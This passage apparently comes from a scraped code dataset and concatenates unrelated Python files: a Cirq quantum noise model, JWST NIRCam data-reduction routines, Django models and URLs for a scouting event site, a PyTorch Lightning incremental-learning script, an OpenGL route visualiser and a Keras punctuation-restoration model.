The noise is structured\n so the T1 decay is applied, then the readout bitflip, then measurement.\n If a circuit contains measurements, they must be in moments that don't\n also contain gates.\n \"\"\"\n\n def __init__(\n self,\n depol_prob: float,\n bitflip_prob: float,\n decay_prob: float,\n ):\n \"\"\"A depolarizing noise model with damped readout error.\n Args:\n depol_prob: Depolarizing probability.\n bitflip_prob: Probability of a bit-flip during measurement.\n decay_prob: Probability of T1 decay during measurement.\n Bitflip noise is applied first, then amplitude decay.\n \"\"\"\n value.validate_probability(depol_prob, 'depol prob')\n value.validate_probability(bitflip_prob, 'bitflip prob')\n value.validate_probability(decay_prob, 'decay_prob')\n self.qubit_noise_gate = ops.DepolarizingChannel(depol_prob)\n self.readout_noise_gate = ops.BitFlipChannel(bitflip_prob)\n self.readout_decay_gate = ops.AmplitudeDampingChannel(decay_prob)\n\n def noisy_moment(self, moment: 'cirq.Moment',\n system_qubits: Sequence['cirq.Qid']):\n if _homogeneous_moment_is_measurements(moment):\n return [\n ops.Moment(self.readout_decay_gate(q) for q in system_qubits),\n ops.Moment(self.readout_noise_gate(q) for q in system_qubits),\n moment\n ]\n else:\n return [\n moment,\n ops.Moment(self.qubit_noise_gate(q) for q in system_qubits)\n ]\n\n\nclass PerQubitDepolarizingNoiseModel(devices.NoiseModel):\n \"\"\"DepolarizingNoiseModel which allows depolarization probabilities to be\n specified separately for each qubit.\n\n Similar to depol_prob in DepolarizingNoiseModel, depol_prob_map should map\n Qids in the device to their depolarization probability.\n \"\"\"\n\n def __init__(\n self,\n depol_prob_map: Dict['cirq.Qid', float],\n ):\n \"\"\"A depolarizing noise model with variable per-qubit noise.\n\n Args:\n depol_prob_map: Map of depolarizing probabilities for each qubit.\n \"\"\"\n for qubit, depol_prob in depol_prob_map.items():\n value.validate_probability(depol_prob, f'depol prob of {qubit}')\n self.depol_prob_map = depol_prob_map\n\n def noisy_moment(self, moment: 'cirq.Moment',\n system_qubits: Sequence['cirq.Qid']):\n if (_homogeneous_moment_is_measurements(moment) or\n self.is_virtual_moment(moment)):\n return moment\n else:\n gated_qubits = [\n q for q in system_qubits if moment.operates_on_single_qubit(q)\n ]\n return [\n moment,\n ops.Moment(\n ops.DepolarizingChannel(self.depol_prob_map[q])(q)\n for q in gated_qubits)\n ]\n\n\ndef simple_noise_from_calibration_metrics(calibration: engine.Calibration\n ) -> devices.NoiseModel:\n \"\"\"Creates a reasonable PerQubitDepolarizingNoiseModel using the provided\n calibration data. This object can be retrived from the engine by calling\n 'get_latest_calibration()' or 'get_calibration()' using the ID of the\n target processor.\n \"\"\"\n assert calibration is not None\n rb_data: Dict['cirq.Qid', float] = {\n qubit[0]: depol_prob[0] for qubit, depol_prob in\n calibration['single_qubit_rb_total_error'].items()\n }\n return PerQubitDepolarizingNoiseModel(rb_data)\n","sub_path":"cirq/contrib/noise_models/noise_models.py","file_name":"noise_models.py","file_ext":"py","file_size_in_byte":9839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"512729656","text":"\n# NIRCam specific rountines go here\nimport numpy as np\nfrom importlib import reload\nfrom astropy.io import fits\nfrom eureka.S3_data_reduction import sigrej, optspex\nfrom . 
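A plain-Python sketch of the set-based homogeneity check in _homogeneous_moment_is_measurements above: a boolean set of size two means a moment mixes measurement and non-measurement operations.

def all_measurements(flags):
    cases = set(flags)               # {True}, {False}, or {True, False}
    if len(cases) == 2:
        raise ValueError('Moment must be homogeneous')
    return True in cases

assert all_measurements([True, True]) is True
assert all_measurements([False, False]) is False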
import bright2flux as b2f\nreload(b2f)\n\n# Read FITS file from JWST's NIRCam instrument\ndef read(filename, data):\n '''\n Reads single FITS file from JWST's NIRCam instrument.\n\n Parameters\n ----------\n filename : Single filename to read\n data : data object in which the fits data will stored\n returnHdr : Set True to return header files\n\n Returns\n -------\n data : Array of data frames\n err : Array of uncertainty frames\n hdr : List of header files\n master_hdr : List of master header files\n\n History\n -------\n Written by Kevin Stevenson November 2012\n Updated for NIRCam (KBS) May 2021\n\n '''\n assert isinstance(filename, str)\n\n hdulist = fits.open(filename)\n\n # Load master and science headers\n data.mhdr = hdulist[0].header\n data.shdr = hdulist['SCI',1].header\n\n data.intstart = data.mhdr['INTSTART']\n data.intend = data.mhdr['INTEND']\n\n data.data = hdulist['SCI',1].data\n data.err = hdulist['ERR',1].data\n data.dq = hdulist['DQ',1].data\n data.wave = hdulist['WAVELENGTH',1].data\n data.v0 = hdulist['VAR_RNOISE',1].data\n data.int_times = hdulist['INT_TIMES',1].data[data.intstart-1:data.intend]\n\n return data\n\n\ndef unit_convert(data, meta, log):\n if data.shdr['BUNIT'] == 'MJy/sr':\n # Convert from brightness units (MJy/sr) to flux units (uJy/pix)\n # log.writelog('Converting from brightness to flux units')\n # subdata, suberr, subv0 = b2f.bright2flux(subdata, suberr, subv0, shdr['PIXAR_A2'])\n # Convert from brightness units (MJy/sr) to DNs\n log.writelog(' Converting from brightness units (MJy/sr) to electrons')\n meta.photfile = meta.topdir + meta.ancildir + '/' + data.mhdr['R_PHOTOM'][7:]\n data = b2f.bright2dn(data, meta)\n meta.gainfile = meta.topdir + meta.ancildir + '/' + data.mhdr['R_GAIN'][7:]\n data = b2f.dn2electrons(data, meta)\n return data, meta\n\n\ndef flag_bg(data, meta):\n '''\n Outlier rejection of sky background along time axis\n '''\n\n y1, y2, bg_thresh = meta.bg_y1, meta.bg_y2, meta.bg_thresh\n\n bgdata1 = data.subdata[:, :y1]\n bgmask1 = data.submask[:, :y1]\n bgdata2 = data.subdata[:,y2: ]\n bgmask2 = data.submask[:,y2: ]\n bgerr1 = np.median(data.suberr[:, :y1])\n bgerr2 = np.median(data.suberr[:,y2: ])\n estsig1 = [bgerr1 for j in range(len(bg_thresh))]\n estsig2 = [bgerr2 for j in range(len(bg_thresh))]\n\n data.submask[:, :y1] = sigrej.sigrej(bgdata1, bg_thresh, bgmask1, estsig1)\n data.submask[:,y2: ] = sigrej.sigrej(bgdata2, bg_thresh, bgmask2, estsig2)\n\n return data\n\n\ndef fit_bg(data, mask, y1, y2, bg_deg, p3thresh, n, isplots=False):\n '''\n\n '''\n bg, mask = optspex.fitbg(data, mask, y1, y2, deg=bg_deg,\n threshold=p3thresh, isrotate=2, isplots=isplots)\n return (bg, mask, n)\n\n","sub_path":"eureka/S3_data_reduction/nircam.py","file_name":"nircam.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"228488429","text":"from django.urls import path\n\nfrom extenciones.views import ExtensionListadoView, ExtensionCreateView, ExtensionUpdateview, ExtensionListadoViewConsulta, ExtensionView\n\nurlpatterns = [\n # paths del dependencia\n\n path('extension/listado/', ExtensionListadoView.as_view(), name=\"ext_listado\"),\n path('extension/crear/', ExtensionView.as_view(), name=\"ext_extcrear\"),\n path('extension/consulta/',\n ExtensionListadoViewConsulta.as_view(), name=\"ext_consulta\"),\n path('extension/nuevo/', ExtensionCreateView.as_view(), name=\"ext_nuevo\"),\n path('extension/editar/',\n ExtensionUpdateview.as_view(), 
name=\"ext_editar\"),\n\n]\n","sub_path":"extenciones/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"214766215","text":"\n\nimport os\n\nfrom pytorch_lightning import Trainer, seed_everything\n\nfrom pytorch_lightning.callbacks.early_stopping import EarlyStopping\n# from pl_bolts.callbacks import PrintTableMetricsCallback\nfrom pytorch_lightning.callbacks import ModelCheckpoint\nfrom pytorch_lightning.callbacks.lr_monitor import LearningRateMonitor\n# from pytorch_lightning.callbacks import RichProgressBar\n\n\nfrom pytorch_lightning.loggers import MLFlowLogger\n\n\n\n# from continuum import ClassIncremental\n# from continuum.tasks import split_train_val\n# from continuum.datasets import MNIST, CIFAR10\n\nfrom data.incremental_datamodule import IncrementalDataModule\nfrom data.incremental_scenario import incremental_scenario\n\nfrom learner.Base_learner import Base_learner\n\nfrom args.args_trainer import args_trainer\nfrom args.args_model import args_model\n# print(args_model)\n\n# changhong code\nfrom incremental_net.inc_net import IncrementalNet\ninc_network = IncrementalNet(\"resnet32\", pretrained=False, gradcam=False)\n\nimport sys\n\nseed_everything(42, workers=True)\n\n# model\nlearner = Base_learner(\n inc_network, \n args_model\n)\n\nexp_name = \"incremental_learning\"\nmlflow_logger = MLFlowLogger(experiment_name=exp_name, tracking_uri=\"http://localhost:10500\")\nrun_id = mlflow_logger.run_id\n\n\n\n# callbacks\n# print_table_metrics_callback = PrintTableMetricsCallback()\n\n\nmonitor_metric = 'loss_epoch'\nmode = 'min'\nearly_stop_callback = EarlyStopping(\n monitor=monitor_metric,\n min_delta=0.00,\n patience=3,\n verbose=False,\n mode=mode,\n strict = True)\n\n# checkpoint_callback = ModelCheckpoint(\n# dirpath=f'saved_models/{run_id}/',\n# monitor=monitor_metric,\n# filename='sample-mnist-{epoch:02d}-{val_acc:.2f}',\n# save_top_k=3,\n# mode=mode,\n# save_last=True\n# )\nlearning_rate_monitor_callback = LearningRateMonitor(\n logging_interval='epoch'\n)\n\ntrainer = Trainer(\n accelerator=args_trainer.accelerator,\n gpus = args_trainer.gpus, # [0,1,7,8,9] / -1\n # gpus = \"1\",\n max_epochs=args_trainer.max_epochs,\n progress_bar_refresh_rate=args_trainer.progress_bar_refresh_rate,\n check_val_every_n_epoch = args_trainer.check_val_every_n_epoch,\n weights_summary=args_trainer.weights_summary,\n callbacks = [learning_rate_monitor_callback], # early_stop_callback, checkpoint_callback\n log_every_n_steps = args_trainer.log_every_n_steps, # default: 50\n logger = mlflow_logger,\n sync_batchnorm = args_trainer.sync_batchnorm,\n fast_dev_run = args_trainer.fast_dev_run,\n num_sanity_val_steps = args_trainer.num_sanity_val_steps\n) # precision=16 [checked]\n\n\n\n\n# PATH_DATASETS = \"/data/Public/Datasets\"\n# increment=2\n# initial_increment=2\n\nif trainer.is_global_zero:\n # print(mlflow_logger.run_id)\n print(f' \\\n batch_size: {args_model.batch_size},\\n \\\n learning_rate: {args_model.learning_rate},\\n \\\n dataset: {args_model.dataset},\\n \\\n initial_increment: {args_model.initial_increment}, \\n \\\n increment: {args_model.increment} \\\n ')\n \n ckpt_save_root_dir = 'saved_models/'\n ckpt_save_dir = os.path.join(ckpt_save_root_dir, run_id)\n if not os.path.exists(ckpt_save_dir):\n os.makedirs(ckpt_save_dir)\n \n# mlflow_logger.log_hyperparams(args_model) [checked]\n\n\ninc_scenario = incremental_scenario(\n dataset_name = 
args_model.dataset,\n train_additional_transforms = [],\n test_additional_transforms = [],\n initial_increment = args_model.initial_increment,\n increment = args_model.increment,\n datasets_dir = args_model.datasets_dir\n)\n# inc_scenario.setup()\ntrain_scenario, test_scenario = inc_scenario.get_incremental_scenarios()\n# print(inc_scenario.class_order)\n\nnb_seen_classes = args_model.initial_increment\n\n\nfor task_id, taskset in enumerate(train_scenario):\n try:\n\n learner.model.update_fc(nb_seen_classes)\n dm = IncrementalDataModule(\n task_id = task_id, \n train_taskset = taskset, \n test_taskset = test_scenario[:task_id+1],\n dims = inc_scenario.dims, \n nb_total_classes = inc_scenario.nb_total_classes,\n batch_size = args_model.batch_size,\n num_workers = args_model.num_workers,\n val_split_ratio = args_model.val_split_ratio)\n\n trainer.fit(learner, datamodule=dm)\n \n # [checked]\n # dm.setup('test')\n # trainer.test(learner, dataloaders=dm.test_dataloader())\n \n if trainer.is_global_zero: # control that only one device can print.\n print('*'*100)\n print(f'nb_seen_classes have been seen is: {nb_seen_classes}')\n \n trainer.save_checkpoint(os.path.join(ckpt_save_dir, f\"{nb_seen_classes}-{learner.last_incremental_acc.item()}.ckpt\"))\n\n learner.update_nb_seen_classes(nb_seen_classes)\n nb_seen_classes += args_model.increment\n\n del dm\n del trainer\n \n trainer = Trainer(\n accelerator=args_trainer.accelerator,\n gpus = args_trainer.gpus, # [0,1,7,8,9] / -1\n # gpus = \"1\",\n max_epochs=args_trainer.max_epochs,\n progress_bar_refresh_rate=args_trainer.progress_bar_refresh_rate,\n check_val_every_n_epoch = args_trainer.check_val_every_n_epoch,\n weights_summary=args_trainer.weights_summary,\n callbacks = [learning_rate_monitor_callback], # early_stop_callback, checkpoint_callback RichProgressBar()\n log_every_n_steps = args_trainer.log_every_n_steps, # default: 50\n logger = mlflow_logger, # use the same logger, otherwise it will create new runs in mlflow.\n sync_batchnorm = args_trainer.sync_batchnorm,\n fast_dev_run = args_trainer.fast_dev_run,\n num_sanity_val_steps = args_trainer.num_sanity_val_steps\n ) # precision=16 [checked]\n except KeyboardInterrupt:\n try:\n break\n sys.exit(0)\n except SystemExit:\n os._exit(0)\n\n# test [worked]\n# dm.setup('test')\n# trainer.test(classifier, dataloaders=dm.test_dataloader())\n# test [not worked]\n# trainer.test(classifier, datamodule=dm)\n\n# 复现\n'''\n 查看iCaRL源代码,看看超参数设置\n 查看pl中有关lr adjust的callback https://pytorch-lightning.readthedocs.io/en/latest/extensions/callbacks.html 都看看\n'''\n\n# 提问,循环程序停止的问题,准备一个minimal example\n\n# 发现trainer.fit 在训练第二个增量开始,只会训练一个epoch,这猜想是和trainer保持不变,存在状态记忆有关。","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"537274930","text":"import sys\n\nN = int(input())\n\nA = list(map(int,input().split()))\n\nnums = []\n\nfor i in range(N):\n nums.append([i,A[i]])\n\nnums.sort(key = lambda x:x[1])\n\ncal = []\n\nfor i in range(N):\n cal.append([nums[i][0],i])\n \ncal.sort(key = lambda x:x[0])\nP = [str(num[1]) for num in cal]\n\nprint(' '.join(P))\n\n","sub_path":"1015 수열 정렬 실버4.py","file_name":"1015 수열 정렬 실버4.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"467297212","text":"\"\"\"\nDefinition of models.\n\"\"\"\n\nfrom django.db import models\nfrom django.contrib.auth.models 
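An equivalent, shorter formulation of the double-sort ranking used in the sorting exercise above (a sketch of the same algorithm):

A = [2, 3, 1]
order = sorted(range(len(A)), key=lambda i: A[i])  # indices by ascending value
P = [0] * len(A)
for rank, idx in enumerate(order):
    P[idx] = rank
assert P == [1, 2, 0]                              # rank of each original element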
import User\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\nfrom datetime import datetime\nimport googlemaps\n\n# Create your models here.\n\nclass PermissionLevel(models.Model):\n level = models.IntegerField()\n level_name = models.CharField(max_length=255)\n\n def __str__(self):\n return str(self.level) + ' - ' + self.level_name\n\n\nclass State(models.Model):\n state_name = models.CharField(max_length = 100, default = '')\n abbreviation = models.CharField(max_length = 2, default = '')\n\n def __str__(self):\n return self.state_name;\n\n\nclass Region(models.Model):\n region_name = models.CharField(max_length=255, default = '')\n abbreviation = models.CharField(max_length=6, default = '')\n\n def __str__(self):\n return self.region_name\n \n\nclass District(models.Model):\n district_name = models.CharField(max_length=255, default = '')\n pointman_ID = models.ForeignKey(User)\n region_ID = models.ForeignKey(Region)\n\n def __str__(self):\n return self.district_name\n\n\nclass Troop(models.Model):\n troop_number = models.IntegerField(default = 0)\n state = models.ForeignKey(State)\n district = models.ForeignKey(District)\n admin_ID = models.ManyToManyField(User)\n\n def __str__(self):\n return str(self.troop_number)\n\n\nclass Profile(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n address = models.CharField(max_length = 500, default = '', null=True, blank=True)\n troop_number = models.ForeignKey(Troop, default=0, null=True, blank=True)\n permissions = models.ForeignKey(PermissionLevel, default=0)\n \n def __str__(self):\n return str(self.user.username)\n \n def get_troop(self):\n try:\n t = Troop.objects.get(troop_number=self.troop_number.troop_number)\n return t.troop_number\n except:\n return Troop.objects.get(troop_number=0) #'profile.gettroop error'\n\n def get_district(self):\n try:\n t = Troop.objects.get(troop_number=self.troop_number.troop_number)\n d = District.objects.get(district_name=t.district)\n return d\n except:\n return 'profile.getdistrict error'\n\n def get_district_pk(self):\n try:\n t = Troop.objects.get(troop_number=self.troop_number.troop_number)\n d = District.objects.get(district_name=t.district)\n return int(d.pk)\n except:\n return 'profile.getdistrictpk error'\n\n def get_permissions(self):\n try:\n p = PermissionLevel.objects.get(level=self.permissions.level)\n return p.level\n except:\n return 0\n\n @receiver(post_save, sender=User)\n def create_user_profile(sender, instance, created, **kwargs):\n if created:\n Profile.objects.create(user=instance)\n\n @receiver(post_save, sender=User)\n def save_user_profile(sender, instance, **kwargs):\n instance.profile.save()\n \n \nclass EventType(models.Model):\n name = models.CharField(max_length = 255, default = '')\n description = models.TextField(default = '')\n icon = models.FileField(null=True, blank=True)\n \n def __str__(self):\n return self.name\n\n\nclass Event(models.Model):\n name = models.CharField(max_length = 255)\n description = models.TextField(help_text='Enter a description of the event.')\n event_type = models.ForeignKey(EventType)\n date_start = models.DateTimeField(default = datetime.now)\n date_end = models.DateTimeField(default = datetime.now)\n address = models.CharField(max_length = 500, default = '', help_text='Enter the address of the event')\n coord_x = models.CharField(max_length = 255, default = '', null=True, blank=True)\n coord_y = models.CharField(max_length = 255, default = '', null=True, blank=True)\n 
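A hedged usage sketch of the post_save receivers defined above: creating a User should transparently create and save its Profile (model names taken from this file; not a tested snippet).

from django.contrib.auth.models import User

user = User.objects.create_user(username='scout1', password='pw')
user.profile.address = '123 Main St'    # Profile was auto-created by the signal
user.save()                             # save_user_profile persists the change
print(user.profile.get_permissions())   # falls back to 0 if no PermissionLevel row exists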
google_location = models.CharField(max_length = 300, default = '', null=True, blank=True)\n district = models.ForeignKey(District, default = '0', null=True, blank=True)\n payment_url = models.URLField(default = 'https://www.', null=True, blank=True)\n primary_contact_name = models.CharField(max_length=255, default='')\n primary_contact_info = models.CharField(max_length=255, default='', help_text='(123) 333-4445')\n primary_contact_info_type = models.IntegerField(null=True, blank=True)\n creation_date = models.DateTimeField(default = datetime.now)\n creation_user = models.ForeignKey(User, null=True, blank=True)\n\n def __str__(self):\n return self.name;\n\n def get_absolute_url(self):\n url = '/event/' + str(self.id)\n return u'%s' % (url, str(self.name))\n\n def get_troop(self):\n #u = self.creation_user\n #t = Troop.objects.get(troop_number=u.profile.get_troop())\n #return t.troop_number\n\n try:\n t = Troop.objects.get(troop_number=self.creation_user.profile.troop_number.troop_number)\n return t.troop_number\n except:\n return Troop.objects.get(troop_number=0) #'event.gettroop error'\n\n\nclass SearchEvent(models.Model):\n name = models.CharField(max_length = 255, blank=True, null=True)\n description = models.CharField(max_length=255, default = '', blank=True, null=True)\n event_type = models.ForeignKey(EventType, blank=True, null=True)\n date_start = models.DateField(default = '', blank=True, null=True)\n district = models.ForeignKey(District, blank=True, null=True)\n primary_contact_ID = models.ForeignKey(User, blank=True, null=True)\n\n\nclass ListEvent(models.Model):\n event_type = models.ForeignKey(EventType, blank=True, null=True)\n date_start = models.DateField(default = '', blank=True, null=True)\n district = models.ForeignKey(District, blank=True, null=True)\n\n\nclass autofill(models.Model):\n address = models.CharField(max_length=400)","sub_path":"SeniorProject_v01/app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"277150645","text":"#!/usr/bin/env python3\nfrom struct import *\nimport os\n\nore = (2048*512, 59392*512) # (starr,length) cut gpt\ncl_size = 4096\nat_size = cl_size * 4 # AllocationTable\nde_size = 32 # Directory entory\n\nwith open(\"raw.dmg\",\"rb\") as raw:\n raw.seek(ore[0])\n with open(\"OreNoFS.bin\",\"wb\") as f:\n f.write(raw.read(ore[1]))\n\nwith open(\"OreNoFS.bin\",\"rb\") as at:\n with open(\"at.bin\",\"wb\") as f:\n f.write(at.read(at_size))\n with open(\"de.bin\",\"wb\") as f:\n f.write(at.read(de_size))\n\nwith open(\"de.bin\",\"rb\") as de:\n de.seek(1)\n print(\"file_name: {}\".format(de.read(8)))\n de.seek(12)\n file_size = unpack(' maxX :\n maxX = x\n if y > maxY :\n maxY = y\n if x < minX :\n minX = x\n if y < minY :\n minY = y\n \n # Mengubah koordinat berdasarkan skala yang didapat\n num_scale = max(maxX - minX, maxY - minY)\n for node in dataNode :\n x = dataNode[node][0]\n y = dataNode[node][1]\n\n newX = x / num_scale\n newY = y / num_scale\n dataNode[node] = (newX, newY, 0)\n\n\ndef map(dest):\n \n radius = 0.001\n \n for node in dataNode :\n posx, posy = dataNode[node][0], dataNode[node][1]\n glBegin(GL_POLYGON)\n \n # Membedakan warna antara titik tujuan dan titik yang bukan tujuan salesman\n if node in dest :\n glColor3f(1, 1, 0)\n else :\n glColor3f(1,0,1)\n \n # Membentuk kotak yang menandakan suatu titik pada peta\n glVertex2f(posx+radius,posy+radius)\n glVertex2f(posx+radius,posy-radius)\n 
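One hedged note on Event.get_absolute_url above: a format string with a single %s placeholder but a two-element tuple raises TypeError at render time; an anchor tag needs both slots, e.g.:

def get_absolute_url(self):
    url = '/event/' + str(self.id)
    return u'%s' % (url, str(self.name))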
glVertex2f(posx-radius,posy-radius)\n glVertex2f(posx-radius,posy+radius)\n glEnd()\n \ndef route_line(solution_routes) :\n # Melakukan pencetakan rute dari jalan yang dilalui oleh tiap salesman\n color = [1,0,0]\n i = 0\n for routes in solution_routes :\n glBegin(GL_LINES)\n glColor3f(color[0], color[1], color[2])\n\n for route in routes :\n path = route[2]\n for pair in path :\n start, end = pair[0], pair[1]\n glVertex2f(dataNode[start][0], dataNode[start][1])\n glVertex2f(dataNode[end][0], dataNode[end][1])\n\n glEnd()\n # Melakukan pengubahan warna rute untuk tiap salesman yang berbeda\n i += 1\n color[i % 3] += 1\n \n\ndef mouseMove(event) :\n # Melakukan zoom in berdasarkan pergerakan mousewheel\n # Zoom dilakukan dengan memanfaatkan scaling pada sumbu x,y, dan z\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 4: # wheel rolled up\n glScaled(1.05, 1.05, 1.05)\n elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 5: # wheel rolled down\n glScaled(0.95, 0.95, 0.95)\n\ndef printSolutions(solutions) :\n # Mencetak total jarak pada solusi dari tiap salesman, dan mencetak total jarak yang dilalui seluruh salesman\n sum = 0\n for i in range(len(solutions)) :\n sum += solutions[i]\n print(\"Solution route for salesman \" + str(i+1) + \" : \" + str(solutions[i]))\n \n print(\"Total solution : \" + str(sum))\n\ndef main(dest, solution_routes):\n pygame.init()\n \n display = (w,h)\n pygame.display.set_mode(display, DOUBLEBUF|OPENGL, RESIZABLE)\n\n # Setting posisi dan perspektif dari objek yang di visualisasi\n gluPerspective(45, (1.0*display[0]/display[1]), 0.1, 50.0)\n glTranslatef(-0.5,-0.5, -1.5)\n \n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n \n # Melakukan perpindahan menggunakan arrow up, down, left, right pada keyboard\n \n if event.type == pygame.KEYDOWN :\n if event.key == pygame.K_LEFT :\n glTranslatef(0.1,0,0)\n if event.key == pygame.K_RIGHT :\n glTranslatef(-0.1,0,0)\n if event.key == pygame.K_UP :\n glTranslatef(0,-0.1,0)\n if event.key == pygame.K_DOWN :\n glTranslatef(0,+0.1,0)\n \n # melakukan zoom berdasarkan mousewheel event\n mouseMove(event)\n\n glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\n\n map(dest)\n route_line(solution_routes)\n\n pygame.display.flip()\n pygame.time.wait(30)\n\n\nif __name__ == '__main__' : \n city = input(\"Masukkan nama kota : \")\n dataNode = buildDataNode(city)\n dataEdge = buildDataEdge(city)\n solutions, solution_routes, dest = solve(dataNode, dataEdge)\n scale()\n w,h= 1000,1000\n printSolutions(solutions)\n main(dest, solution_routes)\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"598593890","text":"import numpy as np\nimport codecs\nfrom keras.models import Sequential\nfrom keras.layers.recurrent import LSTM\nfrom keras.layers.core import TimeDistributedDense, Activation\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.layers.embeddings import Embedding\nfrom keras.layers import Dropout\nfrom sklearn.metrics import confusion_matrix, accuracy_score, precision_recall_fscore_support, classification_report\nimport keras\nfrom collections import Counter\n\nfrom sklearn.preprocessing import LabelBinarizer\nimport gc\nimport nltk\nimport sys\nimport os\n#### READ GLOVE ####\n\n# Read GloVe Embedding\nBASE_DIR = '.'\nGLOVE_DIR = BASE_DIR + '/GLOVE/'\n#EMBEDDING_DIM = 100 # Embedding 
dimensions\n\nembeddings_index = {}\nf = open(os.path.join(GLOVE_DIR, 'glove.6B.100d.txt'))\nfor line in f:\n values = line.split() #Tokenizer\n word = values[0] # word form\n coefs = np.asarray(values[1:], dtype='float32') # embedding coefficients\n embeddings_index[word] = coefs\nf.close()\n\nprint('Number of embeddings:', len(embeddings_index))\nprint('Ten first element from `the` Embedding Vector :', embeddings_index[\"the\"][:10])\n\n#### SEQUENCE SEGMENTATION ####\n#def chunker(seq, size):\n# return (seq[pos:pos + size] for pos in range(0, len(seq), size))\ndef chunker(seq, size, is_y=False):\n size = size-1\n if is_y:\n return ([\"O\"] + seq[pos:pos + size] for pos in range(0, len(seq), size))\n else:\n return (seq[pos:pos + size] + [\"\"] for pos in range(0, len(seq), size))\n\ndef score(yh, pr):\n coords = [np.where(yhh >= 0)[0][0] for yhh in yh]\n yh = [yhh[co:] for yhh, co in zip(yh, coords)]\n ypr = [prr[co:] for prr, co in zip(pr, coords)]\n fyh = [c for row in yh for c in row]\n fpr = [c for row in ypr for c in row]\n return fyh, fpr\n\ndef encode(x, n):\n result = np.zeros(n)\n result[x] = 1\n return result\n\nchunk_size = int(sys.argv[1])\nvocabulary_size= int(sys.argv[2])\nembedding_size = int(sys.argv[3])\nhidden_size = int(sys.argv[4])\nbatch_size = int(sys.argv[5])\nno_question = int(sys.argv[6])\noptimizer_ = sys.argv[7]\npatience_ = int(sys.argv[8])\n\n#chunk_size = 200\n#vocabulary_size= 20000\n#embedding_size = 100\n#hidden_size = 256\n#batch_size = 200\n#no_question = 0\n#optimizer\t\t= \t\"adam\"\n#patience_\t\t=\t2\n\n# In[4]:\n#### READ TRAIN ####\nif no_question==1:\n\traw = codecs.open('train2012_nq', 'r', \"ISO-8859-1\").readlines()\nelse:\n\traw = codecs.open('train2012', 'r', \"ISO-8859-1\").readlines()\nenv = []\nfor line in raw:\n stripped_line = line.split()\n #print (stripped_line)\n env.append(stripped_line)\n\nall_x=[]\n\nfor i in(range(len(env))):\n if (len(env[i])==2):\n all_x.append(env[i])\n\nX = [x[0] for x in all_x]\ny = [x[1] for x in all_x]\n\nall_text = [c for x in X for c in x]\n\nx_chunks=[]\ny_chunks=[]\nfor group in chunker(X, chunk_size):\n x_chunks.append(group)\nfor group in chunker(y, chunk_size, is_y=True):\n y_chunks.append(group)\n\n### CREATE VOCABULARY ###\n\n# Count the word frequencies\nword_freq = nltk.FreqDist(X)\nprint (\"Found %d unique words tokens.\" % len(word_freq.items()))\n\nwords = word_freq.most_common(vocabulary_size)\n\n\nvocab=[\"\"]+[x[0] for x in words]\nvocab.append(\"UNKNOWN\")\nvocab.append(\"\")\n\n### TRANSFORM TEXTS #\nword2ind = {word: index for index, word in enumerate(vocab)}\nind2word = {index: word for index, word in enumerate(word2ind)}\n\n\n\nlabels = ['O','COMMA','PERIOD']\nif no_question==0:\n labels.append('QUESTION')\nlabel2ind = {label: (index + 1) for index, label in enumerate(labels)}\nind2label = {(index + 1): label for index, label in enumerate(labels)}\n\nprint (label2ind)\n\nprint ('Vocabulary size:', len(word2ind), len(label2ind))\n\nmaxlen = max([len(x) for x in x_chunks])\nprint ('Maximum sequence length:', maxlen)\n\nunknown_token=\"UNKNOWN\"\n\nfor i, sent in enumerate(x_chunks):\n x_chunks[i] = [w if w in word2ind else unknown_token for w in sent]\n\nX_enc = [[word2ind[c] for c in x] for x in x_chunks]\nmax_label = max(label2ind.values()) + 1\ny_enc = [[0] * (maxlen - len(ey)) + [label2ind[c] for c in ey] for ey in y_chunks]\n\n\ny_enc = [[encode(c, max_label) for c in ey] for ey in y_enc]\ny_enci =[]\nfor i in (range(len(y_enc))):\n a=y_enc[i]\n v=np.array(a)\n v=np.delete(v, 0, 
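A tiny trace of the offset chunker defined above (size 4): word chunks gain a trailing empty-string pad while label chunks gain a leading 'O', shifting each label one step right of its word.

xs = list(chunker(['a', 'b', 'c', 'd', 'e'], 4))
ys = list(chunker(['O', 'O', 'COMMA', 'O', 'PERIOD'], 4, is_y=True))
assert xs == [['a', 'b', 'c', ''], ['d', 'e', '']]
assert ys == [['O', 'O', 'O', 'COMMA'], ['O', 'O', 'PERIOD']]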
